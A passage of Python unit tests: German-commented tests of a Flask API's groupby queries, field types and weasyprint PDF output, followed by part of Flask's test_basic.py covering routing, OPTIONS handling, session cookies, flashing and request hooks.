# groupby mit zweifachen label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"gruppe",
"labels": '{"dbtests.gruppe": ["lGruppeA", "lGruppeB"]}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppeA': 'A', 'lGruppeB': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'B', 'lGruppeB': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'C', 'lGruppeB': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit label fehlerhaft " )
# groupby mit fields und label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe",
"labels": '{"dbtests.gruppe": "lGruppe"}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual(response.json["data"],
[
{'attributes': {'lGruppe': 'A', 'hasChildren': 1}, 'id': None, 'type': 'dbtests'},
{'attributes': {'lGruppe': 'B', 'hasChildren': 2}, 'id': None, 'type': 'dbtests'},
{'attributes': {'lGruppe': 'C', 'hasChildren': 2}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit fields und label fehlerhaft" )
# groupby mit fields und zweifachen label testen
response = self.app.get( "api/dbtests/groupby", query_string={
"fields[dbtests]":"gruppe",
"labels": '{"dbtests.gruppe": ["lGruppeA", "lGruppeB"]}'
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"],
[
{'attributes': {'hasChildren': 1, 'lGruppeA': 'A', 'lGruppeB': 'A'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'B', 'lGruppeB': 'B'}, 'id': None, 'type': 'dbtests'},
{'attributes': {'hasChildren': 2, 'lGruppeA': 'C', 'lGruppeB': 'C'}, 'id': None, 'type': 'dbtests'}
]
, "groupby mit fields und label fehlerhaft" )
# id als gruppe wird ausgefiltert
response = self.app.get( "api/dbtests/groupby", query_string={
"groups":"id"
})
self.assertEqual(response.status_code, 200, "Api Status nicht 200")
self.assertEqual( response.json["data"], [
{'attributes': {'hasChildren': 1}, 'id': 1, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 2, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 3, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 4, 'type': 'dbtests'},
{'attributes': {'hasChildren': 1}, 'id': 5, 'type': 'dbtests'}
] , "id als gruppe wird ausgefiltert" )
def test_webapp_db_typen( self ):
''' Test different field types
'''
# .. todo:: numerische Felder -
# datums Felder - date
# json Felder - data
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
"date":"2020-08-19",
"integer": 6,
"data": {"A":1},
"float": 1/3,
"decimal" : 1.2345, # soll nur 1.23 ergeben
"numeric" : 5.6789,
"isodate" :"2020-08-19",
"isodatetime" :"2020-08-19 14:37"
},
"type":"dbtests"
}
}), follow_redirects=True)
#print( response.json["data"] )
#self.assertEqual( response.status_code, 201, "Api Status nicht 201 (Created)")
#self.assertEqual( response.json["data"]["attributes"]["date"], '2020-08-19', "Datensatz datum ist nicht 2020-08-19")
#self.assertEqual( response.json["data"]["attributes"]["data"], {"A":1}, 'Datensatz data ist nicht {"A":1}')
#self.assertEqual( response.json["data"]["attributes"]["float"], 0.3333333333333333, 'Datensatz float ist nicht 0.3333333333333333')
response = self.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data" : {
"attributes": {
"string":"sechs", # Pflichtfeld
"date":"2020-08-19",
"integer": 6,
"data": {"A":1},
"float": 1/3,
"decimal" : 12345.3456, # soll nur 12345.35 ergeben
"numeric" : 5.6789,
"isodate" :"2020-08-19",
"isodatetime" :"2020-08-19 14:37"
},
"type":"dbtests"
}
}), follow_redirects=True)
#print( response.json["data"] )
pass
def check_pdf_data( self, data, contents=-1, pages=-1, intern_check:bool=False ):
''' Checks pdf data against previously stored data
Creates a dir 'check' in the unittest dir resources to store the comparison data there.
If it already exists, the files found there are used as the check reference.
Parameters
----------
data : dict
- body: dict
- overlays: dict
- pages: int
- pdf_filename: string
- pdf_filepath: string
- png_filename: string
- png_filepath: string
contents : int
Number of content areas
pages : int
Number of pages in the PDF
intern_check:
If True, the check is done in tests and not in the normal pdf output location. Default is False
Returns
-------
None.
'''
#print( data["content"] )
self.assertIn("pdf_filename", data,
"PDF data fehlerhaft filename fehlt"
)
self.assertIn("png_filepath", data,
"PNG data fehlerhaft filepath fehlt"
)
check = {}
if intern_check == True:
check_dir = osp.join( ABSPATH, "resources", "check" )
else:
check_dir = osp.join( os.path.dirname( data["pdf_filepath"] ), "check" )
# create the folder if it does not already exist
if not os.path.exists( check_dir ):
try:
os.makedirs( check_dir )
except IOError as e:
print("Unable to create dir.", e)
# Dateiname für den Inhalt festlegen
json_check_name = osp.join( check_dir, data["pdf_filename"] ) + ".json"
png_check_name = osp.join( check_dir, data["png_filename"] )
png_new_name = data["png_filepath"]
# save the current content
with open( data["pdf_filepath"] + ".json" , "w" ) as json_file:
json.dump( data["content"] , json_file, indent=2 )
# beim erstenmal pdfData content in unittest anlegen
if not os.path.exists( json_check_name ):
with open(json_check_name, "w" ) as json_file:
# print("save", json_check_name)
json.dump( data["content"] , json_file, indent=2 )
if intern_check == True:
pdf_check_name = osp.join( check_dir, data["pdf_filename"] )
# beim erstenmal pdf nach check kopieren
if not os.path.exists( pdf_check_name ):
# adding exception handling
try:
copyfile( data["pdf_filepath"], pdf_check_name)
except IOError as e:
print("Unable to copy file.", e)
# beim erstenmal png nach check kopieren
if not os.path.exists( png_check_name ):
# adding exception handling
try:
copyfile(png_new_name, png_check_name)
except IOError as e:
print("Unable to copy file.", e)
page_names = data["content"].keys()
#print(page_names)
# ggf Anzahl der Bereiche prüfen
if contents > -1:
self.assertEqual(
len( page_names ),
contents,
"Anzahl der content Bereiche in '{}' stimmt nicht.".format( data["pdf_filepath"] )
)
# ggf Anzahl der Seiten prüfen
if pages > -1:
self.assertEqual(
data["pages"],
pages,
"Anzahl der Seiten in '{}' stimmt nicht.".format( data["pdf_filepath"] )
)
# erzeugte png vergleichen und diff speichern
png_check = img_io.imread( png_check_name )
png_new = img_io.imread( png_new_name )
self.assertEqual(
png_check.shape,
png_new.shape,
"Die Bildgrößen in '{}' stimmen nicht.".format( data["pdf_filepath"] )
)
# create and save the image comparison
compare = compare_images(png_check, png_new, method='diff')
img_io.imsave( png_new_name + ".diff.png", compare )
# passende check daten (json_check_name) laden
with open( json_check_name ) as json_file:
check = json.load( json_file )
# einige content Inhalte prüfen
from bs4 import BeautifulSoup
for page_name, content in data["content"].items():
bs_data = BeautifulSoup( content, 'html.parser')
bs_check = BeautifulSoup( check[ page_name ], 'html.parser')
# zuerst die texte
data_text = bs_data.find_all('div', {"class": "text"} )
check_text = bs_check.find_all('div', {"class": "text"} )
self.assertEqual(
data_text,
check_text,
"PDF content .text in '{}' ist fehlerhaft".format( data["pdf_filepath"] )
)
# gesamt check der Bilder
def check_mse(imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
# MeanCheck durchführen
try:
mse = check_mse( png_check, png_new )
except:
mse = -1
#print( "Der PNG Vergleichsbild MSE von '{}' ist '{}'.".format( data["png_filepath"] + ".diff.png", mse ) )
#mse=0.0
self.assertEqual( 0.0, mse,
"Der PNG Vergleichsbild MSE stimmt nicht. Diff image '{}' prüfen. Test erneut durchführen.".format( data["png_filepath"] + ".diff.png" )
)
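# Hedged worked example of the MSE check in check_pdf_data above (illustration
# only, never called): for two 2x2 images that differ in a single pixel by 2,
# the squared differences sum to 4, so MSE = 4 / (2*2) = 1.0; identical images
# give 0.0, which is exactly what the png comparison above expects.
def _example_mse( self ):
    import numpy as np
    image_a = np.zeros( (2, 2) )
    image_b = np.zeros( (2, 2) )
    image_b[0, 0] = 2.0
    err = np.sum( (image_a.astype("float") - image_b.astype("float")) ** 2 )
    err /= float( image_a.shape[0] * image_a.shape[1] )
    return err   # -> 1.0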
def test_isp_mpdf_fonts( self ):
"""Testet Fonts für die PDF Erstellung mit fc-list
Benötigte Fonts:
* DejaVuSerif
* Material Design Icons
Returns
-------
None.
"""
import subprocess
cmd = '/usr/bin/fc-list --format="%{family[0]}\n" | sort | uniq'
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]
self.assertIn(
b"Material Design Icons",
output,
"Der Font 'Material Design Icons' fehlt im System"
)
self.assertIn(
b"DejaVu Serif",
output,
"Der Font 'DejaVuSerif' fehlt im System"
)
def test_isp_mpdf_base( self ):
''' Create a PDF document
'''
response = self.app.get( "api/dummy/pdf" )
self.assertEqual(response.status_code, 400, "Status nicht 400")
self.assertEqual(
response.data,
b"Keine PDF Datei (nofile.pdf) gefunden",
"Testet Fehler bei Rückgabe eine fehlenden PDF Datei "
)
# zuerst nur ein leeres PDF mit overlay
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-1"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.assertEqual( response.json["data"]["body"], "", "PDF body ist nicht leer" )
self.check_pdf_data( response.json["data"], contents=0, pages=1, intern_check=True )
# text und markdown mit Header (h2)
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-2"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# if an error occurs here, the css integration of weasyprint is not correct
self.check_pdf_data( response.json["data"], contents=1, pages=1, intern_check=True )
# wie test 2 aber markdown zuerst
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-2a"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
#print( response.json["data"] )
self.check_pdf_data( response.json["data"], contents=1, pages=1, intern_check=True )
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-3"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
self.check_pdf_data( response.json["data"], contents=2, pages=4, intern_check=True )
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-4"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# if an error occurs here, the font integration of weasyprint is not correct
self.check_pdf_data( response.json["data"], contents=2, pages=3, intern_check=True )
#print( response.json )
# .. todo:: rückgabe als pdf
def check_weasyprint( self ):
''' Create a PDF document with weasyprint
'''
# pdf weasyprint test
from weasyprint import HTML, CSS
from weasyprint.fonts import FontConfiguration
font_config = FontConfiguration()
from weasyprint import default_url_fetcher
files_loaded = []
def log_url_fetcher(url):
files_loaded.append( url )
return default_url_fetcher(url)
# HTML('<h1>foo') would be filename
base_dir = os.path.join( ABSPATH, "..", "resources" )
html = HTML(string='''
<h1>The title</h1>
<div class="blue-text">blauer Text</div>
<span>mdi-check-outline: </span><span><i class="mdi mdi-check-outline"></></span><span> Oder?</span>
''')
css = CSS(string='''
@import url(mpdf_styles.css);
h1 { font-family: Arial,"Helvetica Neue",Helvetica,sans-serif }
''', font_config=font_config, url_fetcher=log_url_fetcher, base_url=base_dir )
pdf_file_name = os.path.join( ABSPATH, 'files', 'weasyprint.pdf')
html.write_pdf( pdf_file_name, stylesheets=[css], font_config=font_config)
# es sollten min. 5 Dateien eingelesen werden
self.assertGreaterEqual(len(files_loaded), 5, "Anzahl nicht >= 5")
# only test 4
response = self.app.get( "api/dummy/pdf", query_string={
"name" : "test-4"
} )
self.assertEqual(response.status_code, 200, "Status nicht 200")
# if an error occurs here, the font integration of weasyprint is not correct
self.check_pdf_data( response.json["data"], contents=2, pages=3, intern_check=True )
# print( files_loaded, len(files_loaded) )
def suite( testClass:None ):
'''Adds all functions starting with test_ from the given class to the suite
Parameters
----------
testClass : unittest.TestCase
Class to be tested
Returns
-------
suite : unittest.TestSuite
'''
if not testClass:
testClass = ispTest
suite = unittest.TestSuite( )
logger.setLevel( logging.ERROR ) # ERROR DEBUG WARNING
if testClass:
#suite.addTest( testClass('test_config_jinja') )
#suite.addTest( testClass('check_weasyprint') )
#suite.addTest( testClass('test_webapp_db_tests_C') )
#suite.addTest( testClass('test_webapp_db_tests_B') )
#return suite
for m in dir( testClass ):
if m.startswith('test_config_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_base_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_dummy_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_webapp_db_'):
suite.addTest( testClass(m), )
pass
elif m.startswith('test_isp_mpdf_'):
suite.addTest( testClass(m), )
pass
return suite
# -----------------------------------------------------------------------------
if __name__ == '__main__':
'''
0 (quiet): you just get the total numbers of tests executed and the global result
1 (default): you get the same plus a dot for every successful test or a F for every failure
2 (verbose): you get the help string of every test and the result
'''
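# Hint (standard unittest API, not changed here): a more verbose run as described
# above could use unittest.TextTestRunner( verbosity=2 ); the default below is 1.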
runner = unittest.TextTestRunner()
runner.run( suite( ispTest ) )
# -----------------------------------------------------------------------------
# test_basic.py
# -----------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
import re
import sys
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, "options"):
rv = client.options("/")
else:
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
if hasattr(client, "options"):
rv = client.options("/more")
else:
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return text_type(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.headers["Vary"] = "Accept-Encoding, Accept-Language"
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash(u"Hello World")
flask.flash(u"Hello World", "error")
flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u"Hello World",
u"Hello World",
flask.Markup(u"<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", u"Hello World"),
("error", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", u"Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == u"Hello World"
assert messages[1] == flask.Markup(u"<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
